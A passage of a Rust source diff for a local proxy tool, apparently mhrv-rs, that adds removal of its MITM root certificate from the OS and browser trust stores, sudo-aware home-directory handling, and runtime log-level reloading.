+                // can't race. Gate and flip before spawning; the worker
+                // clears on exit.
+                {
+                    let mut st = shared.state.lock().unwrap();
+                    if st.cert_op_in_progress {
+                        push_log(
+                            &shared,
+                            "[ui] cert op already in progress — ignoring duplicate install",
+                        );
+                        continue;
+                    }
+                    st.cert_op_in_progress = true;
+                }
                 let shared2 = shared.clone();
                 std::thread::spawn(move || {
                     push_log(&shared2, "[ui] installing CA...");
                     let base = data_dir::data_dir();
-                    if let Err(e) = MitmCertManager::new_in(&base) {
-                        push_log(&shared2, &format!("[ui] CA init failed: {}", e));
-                        return;
-                    }
-                    let ca = base.join(CA_CERT_FILE);
-                    match install_ca(&ca) {
-                        Ok(()) => {
-                            push_log(&shared2, "[ui] CA install ok");
-                            let mut st = shared2.state.lock().unwrap();
+                    let result = (|| -> Result<(), String> {
+                        if let Err(e) = MitmCertManager::new_in(&base) {
+                            return Err(format!("CA init failed: {}", e));
+                        }
+                        let ca = base.join(CA_CERT_FILE);
+                        install_ca(&ca).map_err(|e| format!("CA install failed: {}", e))
+                    })();
+                    {
+                        let mut st = shared2.state.lock().unwrap();
+                        st.cert_op_in_progress = false;
+                        if result.is_ok() {
                             st.ca_trusted = Some(true);
                             st.ca_trusted_at = Some(Instant::now());
                         }
-                        Err(e) => {
-                            push_log(&shared2, &format!("[ui] CA install failed: {}", e));
+                    }
+                    match result {
+                        Ok(()) => push_log(&shared2, "[ui] CA install ok"),
+                        Err(msg) => {
+                            push_log(&shared2, &format!("[ui] {}", msg));
                             push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --install-cert");
                         }
                     }
                 });
             }
+            Ok(Cmd::RemoveCa) => {
+                // Authoritative proxy-active guard: the UI button is
+                // disabled when proxy_active/running is set, but a
+                // Cmd::RemoveCa may already be queued by the time the
+                // Start handler flips the flag. `active` is owned by
+                // this thread so its state is the real source of truth
+                // — reject removal any time a proxy handle is alive,
+                // whether it's still starting or fully running.
+                if active.is_some() {
+                    push_log(
+                        &shared,
+                        "[ui] cannot remove CA: proxy is running or starting — stop it first",
+                    );
+                    continue;
+                }
+                // Shared cert-op gate: covers Install CA too, so back-
+                // to-back Install → Remove clicks can't race. The
+                // button is already disabled while this is set, but a
+                // queued command can still arrive here.
+                {
+                    let mut st = shared.state.lock().unwrap();
+                    if st.cert_op_in_progress {
+                        push_log(
+                            &shared,
+                            "[ui] cert op already in progress — ignoring duplicate remove",
+                        );
+                        continue;
+                    }
+                    st.cert_op_in_progress = true;
+                }
+                let shared2 = shared.clone();
+                std::thread::spawn(move || {
+                    push_log(&shared2, "[ui] removing CA (trust store + files)...");
+                    let base = data_dir::data_dir();
+                    let result = remove_ca(&base);
+                    {
+                        let mut st = shared2.state.lock().unwrap();
+                        st.cert_op_in_progress = false;
+                        if result.is_ok() {
+                            st.ca_trusted = Some(false);
+                            st.ca_trusted_at = Some(Instant::now());
+                        }
+                    }
+                    match result {
+                        Ok(outcome) => {
+                            push_log(&shared2, &format!("[ui] {}", outcome.summary()));
+                            push_log(
+                                &shared2,
+                                "[ui] config.json and Apps Script deployment untouched",
+                            );
+                        }
+                        Err(e) => {
+                            push_log(&shared2, &format!("[ui] CA remove failed: {}", e));
+                            push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --remove-cert");
+                        }
+                    }
+                });
+            }
             Ok(Cmd::TestSni { google_ip, sni }) => {
                 let shared2 = shared.clone();
                 {
@@ -1915,7 +2466,21 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                 std::thread::spawn(move || {
                     let base = data_dir::data_dir();
                     let ca = base.join(CA_CERT_FILE);
-                    let trusted = mhrv_rs::cert_installer::is_ca_trusted(&ca);
+                    let file_exists = ca.exists();
+                    // Probe the trust store by name — independent of
+                    // whether the on-disk ca.crt happens to be there.
+                    // The file and the trust-store entry can be out of
+                    // sync (e.g. after a partial removal), and that
+                    // mismatch is exactly what Check CA must surface.
+                    let trusted = mhrv_rs::cert_installer::is_ca_trusted_by_name();
+                    push_log(
+                        &shared2,
+                        &format!(
+                            "[ui] check CA: file={} trust_store={}",
+                            if file_exists { "present" } else { "missing" },
+                            if trusted { "trusted" } else { "not trusted" },
+                        ),
+                    );
                     let mut st = shared2.state.lock().unwrap();
                     st.ca_trusted = Some(trusted);
                     st.ca_trusted_at = Some(Instant::now());
@@ -1930,7 +2495,10 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                 }
                 rt.spawn(async move {
                     let result = mhrv_rs::update_check::check(route).await;
-                    push_log(&shared2, &format!("[ui] update check: {}", result.summary()));
+                    push_log(
+                        &shared2,
+                        &format!("[ui] update check: {}", result.summary()),
+                    );
                     {
                         let mut st = shared2.state.lock().unwrap();
                         st.last_update_check = Some(UpdateProbeState::Done(result));
@@ -1990,14 +2558,19 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
 /// Install a tracing subscriber that mirrors every log event into the UI's
 /// Recent log panel.
 ///
-/// Respects `RUST_LOG` if set. Otherwise defaults to `info` — which is what
-/// users mean when they pick a non-default log level in the form. (trace /
-/// debug flip too much noise for a local GUI, so the combo-box changes level
-/// live via the `reload` handle that `with_env_filter` gives us but we keep
-/// the default boot-time level at info so first-run behavior is sensible.)
-fn install_ui_tracing(shared: Arc<Shared>) {
+/// Filter precedence (issue #401, v1.8.2):
+///   1. `RUST_LOG` env var, if set
+///   2. The saved form's `log_level` (passed in from the loaded config)
+///   3. `info,hyper=warn` as a sensible default
+///
+/// The constructed filter is wrapped in a `reload::Layer` and the handle
+/// is stashed in `LOG_RELOAD` so that a Save inside the running UI can
+/// reinstall the filter without a restart. See `apply_log_level`.
+fn install_ui_tracing(shared: Arc<Shared>, config_level: &str) {
     use tracing_subscriber::fmt::MakeWriter;
-    use tracing_subscriber::EnvFilter;
+    use tracing_subscriber::layer::SubscriberExt;
+    use tracing_subscriber::util::SubscriberInitExt;
+    use tracing_subscriber::{reload, EnvFilter};
 
     /// A MakeWriter that pushes each line into the shared log panel.
     struct UiLogWriter {
@@ -2051,19 +2624,71 @@ fn install_ui_tracing(shared: Arc<Shared>) {
         }
     }
 
-    let filter =
-        EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new("info,hyper=warn"));
+    // RUST_LOG > config.log_level > "info,hyper=warn"
+    let filter = EnvFilter::try_from_default_env().unwrap_or_else(|_| {
+        let trimmed = config_level.trim();
+        if trimmed.is_empty() {
+            EnvFilter::new("info,hyper=warn")
+        } else {
+            EnvFilter::try_new(trimmed).unwrap_or_else(|_| EnvFilter::new("info,hyper=warn"))
+        }
+    });
+
+    let (filter_layer, reload_handle) = reload::Layer::new(filter);
+    if LOG_RELOAD.set(reload_handle).is_err() {
+        // Already initialized — install_ui_tracing got called twice. Bail
+        // silently rather than panic; the existing subscriber stays live.
+        return;
+    }
 
     let writer = UiLogWriter { shared };
 
-    let _ = tracing_subscriber::fmt()
-        .with_env_filter(filter)
+    let fmt_layer = tracing_subscriber::fmt::layer()
         .with_target(false)
         .with_ansi(false)
-        .with_writer(writer)
+        .with_writer(writer);
+
+    let _ = tracing_subscriber::registry()
+        .with(filter_layer)
+        .with(fmt_layer)
         .try_init();
 }
 
+/// Reload handle for the UI's tracing EnvFilter — populated once at startup
+/// by `install_ui_tracing`. `apply_log_level` uses it to swap in a new
+/// filter when the user clicks Save with a different log level (#401).
+static LOG_RELOAD: std::sync::OnceLock<
+    tracing_subscriber::reload::Handle<
+        tracing_subscriber::EnvFilter,
+        tracing_subscriber::Registry,
+    >,
+> = std::sync::OnceLock::new();
+
+/// Reinstall the tracing filter at runtime. Called from the Save handler
+/// so the user's new `log_level` takes effect without a restart. RUST_LOG
+/// still wins if it was set at process start — explicit override beats
+/// config in both directions.
+fn apply_log_level(level: &str) {
+    use tracing_subscriber::EnvFilter;
+    // An explicit RUST_LOG outranks the saved config, and without a
+    // reload handle there is no installed filter to swap.
+    let env_override = std::env::var_os("RUST_LOG").is_some();
+    let handle = match LOG_RELOAD.get() {
+        Some(h) if !env_override => h,
+        _ => return,
+    };
+    let directive = level.trim();
+    let replacement = match directive {
+        // A blank level selects the same default used at boot.
+        "" => EnvFilter::new("info,hyper=warn"),
+        spec => match EnvFilter::try_new(spec) {
+            Ok(parsed) => parsed,
+            Err(_) => return,
+        },
+    };
+    let _ = handle.modify(|current| *current = replacement);
+}
+
 /// Where we drop downloaded release assets. Prefer the OS user Downloads
 /// dir (via the directories crate that's already in our tree), fall back
 /// to the user-data dir for platforms that don't expose one (edge case).
diff --git a/src/cert_installer.rs b/src/cert_installer.rs
index 0d6eb21e..3e0884dd 100644
--- a/src/cert_installer.rs
+++ b/src/cert_installer.rs
@@ -1,7 +1,7 @@
-use std::path::Path;
+use std::path::{Path, PathBuf};
 use std::process::Command;
 
-use crate::mitm::CERT_NAME;
+use crate::mitm::{CA_DIR, CERT_NAME};
 
 #[derive(Debug, thiserror::Error)]
 pub enum InstallError {
@@ -11,6 +11,180 @@ pub enum InstallError {
     Failed,
     #[error("unsupported platform: {0}")]
     Unsupported(String),
+    #[error("io {path}: {source}")]
+    Io {
+        path: PathBuf,
+        #[source]
+        source: std::io::Error,
+    },
+    #[error("CA still trusted after removal — re-run with admin/sudo")]
+    RemovalIncomplete,
+}
+
+/// Structured outcome of a successful `remove_ca` call. The OS trust
+/// store is always fully clean when we return `Ok(_)` (that's verified
+/// by `is_ca_trusted_by_name` before file deletion), but NSS cleanup is
+/// best-effort — callers need the nuance to print accurate status.
+///
+/// UI/CLI should treat `Clean` as "nothing more to do" and
+/// `NssIncomplete` as a non-fatal warning ("OS CA removed, browser
+/// cleanup partial — follow the logged hint").
+#[derive(Debug, Clone, Copy)]
+pub enum RemovalOutcome {
+    Clean,
+    NssIncomplete(NssReport),
+}
+
+impl RemovalOutcome {
+    /// Render the outcome as a single sentence for logs or a status banner.
+    pub fn summary(&self) -> String {
+        let report = match self {
+            Self::Clean => return String::from("CA removed."),
+            Self::NssIncomplete(report) => report,
+        };
+        if report.tool_missing_with_stores_present {
+            "OS CA removed. NSS cleanup skipped — NSS certutil not found.".into()
+        } else {
+            let (ok, tried) = (report.ok, report.tried);
+            format!("OS CA removed. NSS cleanup partial: {}/{} browser stores updated.", ok, tried)
+        }
+    }
+}
+
+/// When running as root via `sudo`, the process's `HOME` / `USER`
+/// environment reflects **root**, not the user who invoked the command.
+/// That breaks every user-scoped cert path this module touches —
+/// `data_dir()` resolves to root's config dir, `mozilla_family_profile_dirs()`
+/// scans root's profiles, macOS `login.keychain-db` is root's. The
+/// removal then operates on paths that probably don't exist, reports
+/// success, and leaves the real user's CA trusted.
+///
+/// This helper detects the real `sudo` case (`geteuid() == 0` AND
+/// `SUDO_USER` set to a non-root user), resolves the invoking user's
+/// home dir (SUDO_HOME, `getent passwd`, or `/Users/$SUDO_USER` /
+/// `/home/$SUDO_USER` fallback), and rewrites `HOME` for the remainder
+/// of the process. The EUID gate is load-bearing: `SUDO_USER` alone is
+/// not proof of elevation (a user can export it, inherit it, or use
+/// `sudo -E`), and blindly trusting it would let a non-root process
+/// redirect config/CA/profile operations to another user's files.
+/// Call once at the top of `main` in every binary (CLI + UI) before
+/// anything else reads HOME. No-op on Windows (UAC keeps the user's
+/// HOME intact) and on non-sudo Unix invocations.
+pub fn reconcile_sudo_environment() {
+    #[cfg(unix)]
+    unix::reconcile_sudo_home();
+}
+
+#[cfg(unix)]
+mod unix {
+    use super::{should_reconcile_for, sudo_parse_passwd_home};
+    use std::path::Path;
+    use std::process::Command;
+
+    pub(super) fn reconcile_sudo_home() {
+        // SAFETY: geteuid() is async-signal-safe and cannot fail.
+        let euid = unsafe { libc::geteuid() };
+        let sudo_user_raw = std::env::var("SUDO_USER").ok();
+        let Some(sudo_user) = should_reconcile_for(euid, sudo_user_raw.as_deref()) else {
+            return;
+        };
+        let sudo_user = sudo_user.to_string();
+        match resolve_home(&sudo_user) {
+            Some(home) => {
+                tracing::info!(
+                    "Detected sudo invocation (SUDO_USER={}): re-rooting HOME to {} \
+                     so user-scoped cert paths target the real user.",
+                    sudo_user,
+                    home
+                );
+                // SAFETY: reconcile_sudo_environment runs at the top of
+                // main() before any other thread is spawned and before
+                // any code has cached HOME.
+                std::env::set_var("HOME", home);
+            }
+            None => {
+                tracing::warn!(
+                    "Running under sudo (SUDO_USER={}), but could not resolve \
+                     the user's home dir. Cert paths will operate on root's \
+                     HOME — which may NOT match where you installed the CA. \
+                     Prefer running without sudo; the app invokes sudo \
+                     internally for system-level steps.",
+                    sudo_user
+                );
+            }
+        }
+    }
+
+    /// Best-effort lookup of `sudo_user`'s home directory: `SUDO_HOME`,
+    /// then `getent passwd`, then `/Users/<user>` or `/home/<user>`.
+    fn resolve_home(sudo_user: &str) -> Option<String> {
+        // Some sudoers configs export SUDO_HOME; prefer it when present.
+        if let Some(h) = std::env::var("SUDO_HOME").ok().filter(|h| !h.is_empty()) {
+            return Some(h);
+        }
+        // Linux: `getent passwd <user>` returns the full passwd entry.
+        if let Ok(out) = Command::new("getent").args(["passwd", sudo_user]).output() {
+            if out.status.success() {
+                let line = String::from_utf8_lossy(&out.stdout);
+                if let Some(h) = sudo_parse_passwd_home(&line) {
+                    return Some(h);
+                }
+            }
+        }
+        // macOS has no getent. Fall back to the convention for both
+        // platforms — require a real directory, not just any path.
+        for root in ["/Users", "/home"] {
+            let candidate = format!("{}/{}", root, sudo_user);
+            if Path::new(&candidate).is_dir() {
+                return Some(candidate);
+            }
+        }
+        None
+    }
+}
+
+/// Decide whether to re-root HOME for a sudo-style invocation, given a
+/// process's effective UID and the value of the `SUDO_USER` env var.
+/// Returns `Some(user)` if and only if we should re-root HOME to that
+/// user's dir; `None` in every other case (normal user, real root
+/// login without sudo, SUDO_USER missing / empty / literally "root").
+///
+/// Extracted as a pure function so every branch — including the
+/// load-bearing `euid == 0 && SUDO_USER unset` path that must leave
+/// HOME as root's own /root — can be asserted with unit tests.
+/// Always compiled so the tests run on every host.
+fn should_reconcile_for<'a>(euid: u32, sudo_user: Option<&'a str>) -> Option<&'a str> {
+    // Only a process that is really running as root may re-root HOME.
+    // For any other EUID the SUDO_USER value proves nothing: it can be
+    // exported by hand, inherited from a shell, or kept by `sudo -E`,
+    // and honoring it would point cert paths at another user's files.
+    if euid != 0 {
+        return None;
+    }
+    match sudo_user {
+        // Plain root login without sudo: root keeps its own HOME.
+        None => None,
+        // Empty or literally "root": there is nothing to reconcile.
+        Some("") | Some("root") => None,
+        // Root on behalf of a different, named user.
+        Some(user) => Some(user),
+    }
+}
+
+/// Pure parser for a single-line `getent passwd` entry.
+/// Always compiled so unit tests can run on every host.
+fn sudo_parse_passwd_home(content: &str) -> Option<String> {
+    // Only the first line is examined; anything after it is ignored.
+    let entry = content.lines().next()?;
+    // passwd format: name:pw:uid:gid:gecos:home:shell
+    let columns: Vec<&str> = entry.split(':').collect();
+    // Index 5 is the home directory. The seven-field minimum mirrors
+    // the format above, so truncated entries are never accepted.
+    match columns.get(5).map(|raw| raw.trim()) {
+        Some(dir) if columns.len() >= 7 && !dir.is_empty() => Some(dir.to_string()),
+        // Too few fields, or a home field that is blank once trimmed.
+        _ => None,
+    }
 }
 
 /// Install the CA certificate at `path` into the system trust store.
@@ -46,12 +220,108 @@ pub fn install_ca(path: &Path) -> Result<(), InstallError> {
     }
 }
 
+/// Remove the CA from the OS trust store, best-effort NSS stores (Firefox
+/// profiles + Chrome/Chromium on Linux), and delete the on-disk
+/// `ca/ca.crt` + `ca/ca.key`. A fresh CA will be regenerated the next
+/// time the proxy starts — and since the Apps Script deployment lives on
+/// Google's side and `config.json` is never touched here, the user does
+/// not have to redeploy `Code.gs` or re-enter their deployment ID.
+/// Platform-specific — may require admin/sudo for system stores.
+///
+/// Safety property: we verify the OS trust store with `is_ca_trusted_by_name`
+/// before deleting `ca/`. If the stale root is still trusted (e.g.
+/// because the system-store delete needed admin and we didn't have it),
+/// we return `RemovalIncomplete` and leave the on-disk files alone — a
+/// regenerated CA with a fresh keypair would otherwise mismatch the
+/// stale trusted root and silently break every HTTPS MITM leaf.
+pub fn remove_ca(base: &Path) -> Result<RemovalOutcome, InstallError> {
+    let os = std::env::consts::OS;
+    tracing::info!("Removing CA certificate on {}...", os);
+
+    // Platforms that merge anchor files into a bundle/database (Linux)
+    // must report whether the refresh step succeeded — the bundle may
+    // still contain the CA even after the anchor file is gone. macOS
+    // and Windows write directly to their stores, so there's nothing
+    // separate to refresh; they rely entirely on the by-name probe.
+    let platform_ok = match os {
+        "macos" => {
+            remove_macos();
+            true
+        }
+        "linux" => remove_linux(),
+        "windows" => {
+            remove_windows();
+            true
+        }
+        other => return Err(InstallError::Unsupported(other.to_string())),
+    };
+
+    // Verify OS trust store removal BEFORE touching browser state. If
+    // the OS removal didn't actually land (e.g. machine-store delete
+    // needed admin we don't have, or a Linux refresh cmd failed), we
+    // must not also strip NSS entries + the Firefox enterprise_roots
+    // pref — that leaves the system in an inconsistent "half-removed"
+    // state (OS still trusts, but Firefox is newly reconfigured) that
+    // only confuses the user. Returning RemovalIncomplete here keeps
+    // the install pristine so a retry is idempotent.
+    //
+    // Must be path-independent — the on-disk cert file may already be
+    // missing for unrelated reasons, and a file-gated check would then
+    // mask a still-trusted stale root.
+    if !platform_ok || is_ca_trusted_by_name() {
+        tracing::error!(
+            "MITM CA is still trusted after OS removal attempt \
+             (platform_ok={}) — refusing to touch browser state or \
+             delete on-disk files. Re-run with admin/sudo to complete \
+             revocation.",
+            platform_ok
+        );
+        return Err(InstallError::RemovalIncomplete);
+    }
+
+    // OS store is clean — only now mutate browser state.
+    let nss = remove_nss_stores();
+
+    let ca_dir = base.join(CA_DIR);
+    if ca_dir.exists() {
+        if let Err(e) = std::fs::remove_dir_all(&ca_dir) {
+            tracing::error!("failed to delete {}: {}", ca_dir.display(), e);
+            return Err(InstallError::Io {
+                path: ca_dir.clone(),
+                source: e,
+            });
+        }
+        tracing::info!("Deleted CA files at {}", ca_dir.display());
+    }
+
+    if nss.is_clean() {
+        Ok(RemovalOutcome::Clean)
+    } else {
+        Ok(RemovalOutcome::NssIncomplete(nss))
+    }
+}
+
 /// Heuristic check: is the CA already in the trust store?
 /// Best-effort — on unknown state we return false to always attempt install.
+///
+/// The `path` guard skips the trust-store probe when the local CA file
+/// is missing, because at install time "no file = nothing to trust" is a
+/// useful shortcut. Revocation uses `is_ca_trusted_by_name` instead —
+/// that path must verify the store regardless of whether the file still
+/// exists, otherwise a pre-deleted `ca.crt` would mask a lingering
+/// trusted root.
 pub fn is_ca_trusted(path: &Path) -> bool {
     if !path.exists() {
         return false;
     }
+    is_ca_trusted_by_name()
+}
+
+/// Path-independent variant of `is_ca_trusted`: queries the OS trust
+/// store by cert name (CERT_NAME) without requiring the on-disk cert
+/// file. Used by `remove_ca` to verify revocation completed even if the
+/// local `ca.crt` was already missing or deleted mid-flight.
+pub fn is_ca_trusted_by_name() -> bool {
     match std::env::consts::OS {
         "macos" => is_trusted_macos(),
         "linux" => is_trusted_linux(),
@@ -115,6 +385,73 @@ fn install_macos(cert_path: &str) -> bool {
     false
 }
 
+/// Delete the CA from the login keychain (no sudo) and, only when a
+/// probe confirms the cert actually lives there, the system keychain
+/// (sudo). Probing first avoids prompting the user — or hanging the
+/// UI's GUI-spawned `sudo` — for a password they don't need when the
+/// cert was only ever installed in the login keychain (the default
+/// path). Exit status is best-effort: `security delete-certificate`
+/// exits non-zero for "not found", which is indistinguishable from
+/// real failures, so the final trust state is verified by the caller
+/// via `is_ca_trusted_by_name`.
+fn remove_macos() {
+    let home = std::env::var("HOME").unwrap_or_default();
+    let login_kc_db = format!("{}/Library/Keychains/login.keychain-db", home);
+    let login_kc = format!("{}/Library/Keychains/login.keychain", home);
+    let login_keychain = if Path::new(&login_kc_db).exists() {
+        login_kc_db
+    } else {
+        login_kc
+    };
+
+    let res = Command::new("security")
+        .args(["delete-certificate", "-c", CERT_NAME, &login_keychain])
+        .status();
+    if matches!(res, Ok(s) if s.success()) {
+        tracing::info!("Removed CA from login keychain.");
+    }
+
+    if macos_system_keychain_has() {
+        let res = Command::new("sudo")
+            .args([
+                "security",
+                "delete-certificate",
+                "-c",
+                CERT_NAME,
+                "/Library/Keychains/System.keychain",
+            ])
+            .status();
+        if matches!(res, Ok(s) if s.success()) {
+            tracing::info!("Removed CA from System keychain.");
+        } else {
+            tracing::warn!(
+                "System keychain still has the CA and the sudo delete did not \
+                 succeed — re-run with an admin password available."
+            );
+        }
+    }
+}
+
+/// Probe-without-sudo: does the System keychain currently contain our
+/// cert? `security find-certificate` against the system keychain path
+/// does not require admin; only `delete-certificate` does. Used to
+/// decide whether to escalate at all.
+fn macos_system_keychain_has() -> bool {
+    // Read-only lookup, so no sudo escalation is involved here.
+    let mut probe = Command::new("security");
+    probe.arg("find-certificate");
+    probe.args(["-a", "-c", CERT_NAME]);
+    probe.arg("/Library/Keychains/System.keychain");
+    // A spawn failure is treated as "not present".
+    let Ok(result) = probe.output() else {
+        return false;
+    };
+    // Require both a zero exit status and some matching output.
+    let exited_ok = result.status.success();
+    let found_any = !result.stdout.is_empty();
+    exited_ok && found_any
+}
+
 fn is_trusted_macos() -> bool {
     let out = Command::new("security")
         .args(["find-certificate", "-a", "-c", CERT_NAME])
@@ -142,7 +479,10 @@ fn install_linux(cert_path: &str) -> bool {
             try_copy_and_run(cert_path, &dest, &[&["update-ca-trust", "extract"]])
         }
         "arch" => {
-            let dest = format!("/etc/ca-certificates/trust-source/anchors/{}.crt", safe_name);
+            let dest = format!(
+                "/etc/ca-certificates/trust-source/anchors/{}.crt",
+                safe_name
+            );
             try_copy_and_run(cert_path, &dest, &[&["trust", "extract-compat"]])
         }
         "openwrt" => {
@@ -154,7 +494,8 @@ fn install_linux(cert_path: &str) -> bool {
                 "OpenWRT detected: the router doesn't need to trust the MITM CA. \
                  Copy {} to each LAN client (browser / OS trust store) instead. \
                  Example: scp root@<router>:{} ./ and import from there.",
-                cert_path, cert_path
+                cert_path,
+                cert_path
             );
             true
         }
@@ -253,7 +594,11 @@ fn classify_os_release(content: &str) -> String {
             Some(x) => x,
             None => continue,
         };
-        let v = v.trim().trim_matches('"').trim_matches('\'').to_ascii_lowercase();
+        let v = v
+            .trim()
+            .trim_matches('"')
+            .trim_matches('\'')
+            .to_ascii_lowercase();
         match k.trim() {
             "ID" => id = v,
             "ID_LIKE" => id_like = v,
@@ -281,13 +626,103 @@ fn classify_os_release(content: &str) -> String {
     "unknown".into()
 }
 
+/// Mirror of `install_linux`: for each known anchor dir, delete our cert
+/// file and run the corresponding refresh command. Tries without sudo
+/// first, falls back to sudo. Missing files are silently skipped —
+/// removal is idempotent.
+///
+/// Key safety behavior: we refresh the trust bundle **regardless of
+/// whether we found an anchor file to delete**. The concern is a retry
+/// after a prior run that deleted the anchor but failed to refresh —
+/// leaving the merged bundle still containing our PEM. On the next
+/// invocation the anchor dir is empty, so a "delete file, then refresh"
+/// contract would skip the refresh entirely and `remove_ca` would see
+/// no anchor file left, declare success, and delete `ca/` while the
+/// stale root is still trusted. Running the refresh unconditionally
+/// catches this.
+///
+/// Returns `false` if any refresh command failed — callers must then
+/// abort file deletion so a regenerated CA with a fresh keypair can't
+/// mismatch the stale root.
+fn remove_linux() -> bool {
+    let safe_name = CERT_NAME.replace(' ', "_");
+    let anchors: &[(&str, &[&str])] = &[
+        (
+            "/usr/local/share/ca-certificates",
+            &["update-ca-certificates"],
+        ),
+        (
+            "/etc/pki/ca-trust/source/anchors",
+            &["update-ca-trust", "extract"],
+        ),
+        (
+            "/etc/ca-certificates/trust-source/anchors",
+            &["trust", "extract-compat"],
+        ),
+    ];
+
+    let mut all_ok = true;
+    for (dir, refresh) in anchors {
+        // Skip distros whose anchor dir doesn't exist — running their
+        // refresh tool (e.g. `trust extract-compat` on a Debian host)
+        // would just error out and falsely mark the removal as failed.
+        if !Path::new(dir).exists() {
+            continue;
+        }
+
+        let path = format!("{}/{}.crt", dir, safe_name);
+        let anchor_present = Path::new(&path).exists();
+        if anchor_present {
+            let deleted =
+                std::fs::remove_file(&path).is_ok() || run_cmd(&["sudo", "rm", "-f", &path]);
+            if !deleted {
+                tracing::warn!("failed to remove {}", path);
+                all_ok = false;
+                continue;
+            }
+        }
+
+        // Always refresh — see doc comment for the retry-safety rationale.
+        let refreshed = run_cmd(refresh) || {
+            let mut full: Vec<&str> = vec!["sudo"];
+            full.extend_from_slice(refresh);
+            run_cmd(&full)
+        };
+        if !refreshed {
+            tracing::error!(
+                "refresh {:?} failed for {} — CA may still be trusted via the merged bundle",
+                refresh,
+                dir
+            );
+            all_ok = false;
+        } else if anchor_present {
+            tracing::info!("Removed CA from {} (bundle refreshed).", dir);
+        } else {
+            tracing::debug!("Refreshed {} bundle (nothing to delete here).", dir);
+        }
+    }
+    all_ok
+}
+
 fn is_trusted_linux() -> bool {
-    let anchor_dirs = [
+    // Check both the anchor dirs (what we write into on install) and
+    // the post-extract dirs (where update-ca-certificates / `trust
+    // extract-compat` etc. copy or symlink our PEM after refresh).
+    // Checking the post-extract side catches the "anchor file already
+    // removed but bundle not regenerated" case on a retry — if we only
+    // looked at anchor dirs, a `remove_ca` retry after a prior refresh
+    // failure could declare success while the merged bundle still
+    // contains our stale root.
+    let dirs = [
         "/usr/local/share/ca-certificates",
         "/etc/pki/ca-trust/source/anchors",
         "/etc/ca-certificates/trust-source/anchors",
+        // Post-extract locations:
+        "/etc/ssl/certs",
+        "/etc/pki/ca-trust/extracted/pem/directory-hash",
+        "/etc/ca-certificates/extracted/cadir",
     ];
-    for d in anchor_dirs {
+    for d in dirs {
         if let Ok(entries) = std::fs::read_dir(d) {
             for e in entries.flatten() {
                 let name = e.file_name();
@@ -310,24 +745,33 @@ fn is_trusted_linux() -> bool {
 /// false on Windows, so the Check-CA button was misleading users into
 /// reinstalling a cert that was already trusted.
 fn is_trusted_windows() -> bool {
-    // `certutil -user -store Root <name>` prints the matching cert entries
-    // on success (stdout), and exits with a non-zero code plus a "Not
-    // found" message if nothing matches. We also check stdout for the
-    // cert name because certutil in some locales returns 0 even on no-
-    // match, just with empty output.
-    for args in [
-        vec!["-user", "-store", "Root", CERT_NAME],
-        vec!["-store", "Root", CERT_NAME],
-    ] {
-        let out = Command::new("certutil").args(&args).output();
-        if let Ok(o) = out {
+    windows_store_has(true) || windows_store_has(false)
+}
+
+/// Query a single Windows Trusted Root store for our CA.
+/// `user = true` hits the current-user store (no admin needed);
+/// `user = false` hits the machine store. `certutil -store Root <name>`
+/// prints the matching cert entries on success and exits non-zero with
+/// "Not found" if nothing matches — we also check stdout for the cert
+/// name because certutil in some locales returns 0 on no-match with
+/// empty output.
+fn windows_store_has(user: bool) -> bool {
+    let mut args: Vec<&str> = Vec::new();
+    if user {
+        args.push("-user");
+    }
+    args.extend(["-store", "Root", CERT_NAME]);
+    let out = Command::new("certutil").args(&args).output();
+    match out {
+        Ok(o) => {
             let stdout = String::from_utf8_lossy(&o.stdout);
-            if o.status.success() && stdout.to_ascii_lowercase().contains(&CERT_NAME.to_ascii_lowercase()) {
-                return true;
-            }
+            o.status.success()
+                && stdout
+                    .to_ascii_lowercase()
+                    .contains(&CERT_NAME.to_ascii_lowercase())
         }
+        Err(_) => false,
     }
-    false
 }
 
 fn install_windows(cert_path: &str) -> bool {
@@ -355,10 +799,51 @@ fn install_windows(cert_path: &str) -> bool {
     false
 }
 
-// ---------- NSS (Firefox + Chrome/Chromium on Linux) ----------
+/// Delete from user and/or machine Trusted Root stores. We probe each
+/// store first with `certutil -store` and only attempt the delete where
+/// the cert actually lives — this avoids the confusing "needs elevation"
+/// error that `-delstore Root` would print when the cert was only ever
+/// installed in the per-user store (the default path for non-admin
+/// runs). Final state is verified by the caller via `is_ca_trusted_by_name`.
+fn remove_windows() {
+    let mut any = false;
+
+    if windows_store_has(true) {
+        let res = Command::new("certutil")
+            .args(["-delstore", "-user", "Root", CERT_NAME])
+            .status();
+        if matches!(res, Ok(s) if s.success()) {
+            tracing::info!("Removed CA from Windows user Trusted Root store.");
+            any = true;
+        } else {
+            tracing::warn!("failed to remove CA from Windows user Trusted Root store");
+        }
+    }
+
+    if windows_store_has(false) {
+        let res = Command::new("certutil")
+            .args(["-delstore", "Root", CERT_NAME])
+            .status();
+        if matches!(res, Ok(s) if s.success()) {
+            tracing::info!("Removed CA from Windows machine Trusted Root store.");
+            any = true;
+        } else {
+            tracing::warn!(
+                "failed to remove CA from Windows machine Trusted Root store \
+                 (run as administrator to complete)"
+            );
+        }
+    }
+
+    if !any {
+        tracing::info!("No MITM CA found in Windows Trusted Root stores.");
+    }
+}
+
+// ---------- NSS (Firefox + LibreWolf + Chrome/Chromium on Linux) ----------
 
 /// Best-effort install of the CA into all discovered NSS stores:
-///   1. Every Firefox profile (each has its own cert9.db).
+///   1. Every Firefox/LibreWolf profile (each has its own cert9.db).
 ///   2. On Linux, the shared Chrome/Chromium NSS DB at ~/.pki/nssdb —
 ///      this is the one update-ca-certificates does NOT populate, and
 ///      missing it was the real blocker for Chrome users who'd installed
@@ -366,18 +851,19 @@ fn install_windows(cert_path: &str) -> bool {
 /// Silently no-ops if `certutil` (from libnss3-tools) isn't on PATH.
 /// Browsers must be closed during install for changes to take effect.
 fn install_nss_stores(cert_path: &str) {
-    // First, try to make Firefox pick up the OS-level CA automatically by
-    // flipping the `security.enterprise_roots.enabled` pref in user.js of
-    // every Firefox profile we find. This is the cleanest cross-platform
-    // fix because it doesn't depend on whether NSS certutil is installed
-    // — Firefox just starts trusting whatever the OS trusts. Especially
-    // important on Windows where NSS certutil isn't on PATH.
-    enable_firefox_enterprise_roots();
+    // First, try to make Firefox/LibreWolf pick up the OS-level CA
